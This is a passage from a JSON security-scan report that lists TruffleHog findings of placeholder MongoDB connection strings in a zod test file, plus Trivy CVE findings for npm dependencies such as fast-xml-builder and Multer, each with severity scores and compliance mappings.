"unknown" }, "location": { "path": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", "startLine": 0 }, "message": "mongodb://username:password@host:1234", "title": "MongoDB secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", "line": 644 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 895, "DetectorName": "MongoDB", "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "context deadline exceeded", "VerificationFromCache": false, "Raw": "mongodb://username:password@host:1234", "RawV2": "", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "917b9a33e85655cd", "ruleId": "MongoDB", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", "startLine": 0 }, "message": "mongodb://username:password@host:1234/defaultauthdb", "title": "MongoDB secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", "line": 646 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 895, "DetectorName": "MongoDB", "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "context deadline exceeded", "VerificationFromCache": false, "Raw": "mongodb://username:password@host:1234/defaultauthdb", "RawV2": "", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "31f0bf34095c5b38", "ruleId": "MongoDB", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", "startLine": 0 }, "message": "mongodb://username:password@host:1234/defaultauthdb?authSource=admin", "title": "MongoDB secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", "line": 647 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 895, "DetectorName": "MongoDB", "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "context deadline exceeded", "VerificationFromCache": false, "Raw": "mongodb://username:password@host:1234/defaultauthdb?authSource=admin", "RawV2": "", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1dda63967d05f07b", "ruleId": "MongoDB", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", "startLine": 0 }, "message": "mongodb://username:password@host:1234/defaultauthdb?authSource=admin&connectTimeoutMS=300000", "title": "MongoDB secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", "line": 649 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 895, "DetectorName": "MongoDB", "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "context deadline exceeded", "VerificationFromCache": false, "Raw": "mongodb://username:password@host:1234/defaultauthdb?authSource=admin&connectTimeoutMS=300000", "RawV2": "", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9491b5fd54f57cb2", "ruleId": "MongoDB", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", "startLine": 0 }, "message": "mongodb://username:password@host:1234/?authSource=admin", "title": "MongoDB secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", "line": 651 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 895, "DetectorName": "MongoDB", "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "context deadline exceeded", "VerificationFromCache": false, "Raw": "mongodb://username:password@host:1234/?authSource=admin", "RawV2": "", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f911dc46b3477b87", "ruleId": "MongoDB", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", "startLine": 0 }, "message": "mongodb://username:password@host:1234/?authSource=admin&connectTimeoutMS=300000", "title": "MongoDB secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", "line": 652 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 895, "DetectorName": "MongoDB", "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "context deadline exceeded", "VerificationFromCache": false, "Raw": "mongodb://username:password@host:1234/?authSource=admin&connectTimeoutMS=300000", "RawV2": "", "Redacted": "", "ExtraData": { "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7e52e475110f77c7", "ruleId": "CVE-2026-3449", "severity": "LOW", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal", "title": "CVE-2026-3449", "description": "Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-3449", "references": [], "tags": [ "vulnerability", "pkg:@tootallnate/once@2.0.0" ], "risk": { "cwe": [ "CWE-705" ] }, "raw": { "VulnerabilityID": "CVE-2026-3449", "VendorIDs": [ "GHSA-vpq2-c234-7xj6" ], "PkgID": "@tootallnate/once@2.0.0", "PkgName": "@tootallnate/once", "PkgIdentifier": { "PURL": "pkg:npm/%40tootallnate/once@2.0.0", "UID": "22f57853d23edc3a" }, "InstalledVersion": "2.0.0", "FixedVersion": "3.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3449", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:605e4b5b1300db1ed54e9a7df765bc7aac56fb87edbbdfda3669e95ed6e21109", "Title": "@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal", "Description": "Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.", "Severity": "LOW", "CweIDs": [ "CWE-705" ], "VendorSeverity": { "ghsa": 1, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P", "V3Score": 3.3, "V40Score": 1.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 4 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-3449", "https://github.com/TooTallNate/once", "https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a", "https://github.com/TooTallNate/once/issues/8", "https://nvd.nist.gov/vuln/detail/CVE-2026-3449", "https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612", "https://www.cve.org/CVERecord?id=CVE-2026-3449" ], "PublishedDate": "2026-03-03T05:17:25.017Z", "LastModifiedDate": "2026-05-19T15:38:48.397Z" }, "context": { "sbom": { "name": "@tootallnate/once", "version": "2.0.0", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 6.671466666666666, "epss": 0.00018, "epss_percentile": 0.04653, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 2, "epss_multiplier": 1.00072, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3bc7bf0933f4ab4f", "ruleId": "CVE-2026-44665", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "fast-xml-builder: fast-xml-builder: Attribute injection leading to information disclosure or content manipulation", "title": "CVE-2026-44665", "description": "fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input data has quotes in attribute values but process entities is not enabled, it breaks the attribute value into multiple attributes. This gives the room for an attacker to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in 1.1.7.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-44665", "references": [], "tags": [ "vulnerability", "pkg:fast-xml-builder@1.1.5" ], "risk": { "cwe": [ "CWE-91" ] }, "raw": { "VulnerabilityID": "CVE-2026-44665", "VendorIDs": [ "GHSA-5wm8-gmm8-39j9" ], "PkgID": "fast-xml-builder@1.1.5", "PkgName": "fast-xml-builder", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-builder@1.1.5", "UID": "e589910a79395ad7" }, "InstalledVersion": "1.1.5", "FixedVersion": "1.1.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44665", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:8e7a89527407be2fe370bc613bdc370fc1331784b6adb3ded33d177053fe6763", "Title": "fast-xml-builder: fast-xml-builder: Attribute injection leading to information disclosure or content manipulation", "Description": "fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input data has quotes in attribute values but process entities is not enabled, it breaks the attribute value into multiple attributes. This gives the room for an attacker to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in 1.1.7.", "Severity": "HIGH", "CweIDs": [ "CWE-91" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "V3Score": 6.1, "V40Score": 8.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44665", "https://github.com/NaturalIntelligence/fast-xml-builder", "https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-5wm8-gmm8-39j9", "https://nvd.nist.gov/vuln/detail/CVE-2026-44665", "https://www.cve.org/CVERecord?id=CVE-2026-44665" ], "PublishedDate": "2026-05-13T16:16:59.093Z", "LastModifiedDate": "2026-05-18T16:16:31.7Z" }, "context": { "sbom": { "name": "fast-xml-builder", "version": "1.1.5", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A03:2021" ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.362266666666663, "epss": 0.00031, "epss_percentile": 0.09168, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.00124, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "291094d0af7c4e5d", "ruleId": "CVE-2026-44664", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient sanitization of XML comments", "title": "CVE-2026-44664", "description": "fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650 in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g, '- -'). This skip the values containing three consecutive dashes (e.g., --->...), allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML content. This vulnerability is fixed in 1.1.6.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-44664", "references": [], "tags": [ "vulnerability", "pkg:fast-xml-builder@1.1.5" ], "risk": { "cwe": [ "CWE-91" ] }, "raw": { "VulnerabilityID": "CVE-2026-44664", "VendorIDs": [ "GHSA-45c6-75p6-83cc" ], "PkgID": "fast-xml-builder@1.1.5", "PkgName": "fast-xml-builder", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-builder@1.1.5", "UID": "e589910a79395ad7" }, "InstalledVersion": "1.1.5", "FixedVersion": "1.1.6", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44664", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:b235fbfdb27300e8e1e953de27d6b5c66dca54b9c9cc963ff98909558f588a80", "Title": "fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient sanitization of XML comments", "Description": "fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650 in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g, '- -'). This skip the values containing three consecutive dashes (e.g., --->...), allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML content. This vulnerability is fixed in 1.1.6.", "Severity": "MEDIUM", "CweIDs": [ "CWE-91" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44664", "https://github.com/NaturalIntelligence/fast-xml-builder", "https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-45c6-75p6-83cc", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6", "https://nvd.nist.gov/vuln/detail/CVE-2026-44664", "https://www.cve.org/CVERecord?id=CVE-2026-44664" ], "PublishedDate": "2026-05-13T16:16:58.937Z", "LastModifiedDate": "2026-05-13T16:58:09.717Z" }, "context": { "sbom": { "name": "fast-xml-builder", "version": "1.1.5", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A03:2021" ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.349866666666665, "epss": 0.00031, "epss_percentile": 0.09168, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.00124, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "56ac1677596b7698", "ruleId": "CVE-2025-47935", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Multer vulnerable to Denial of Service via memory leaks from unclosed streams", "title": "CVE-2025-47935", "description": "Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are 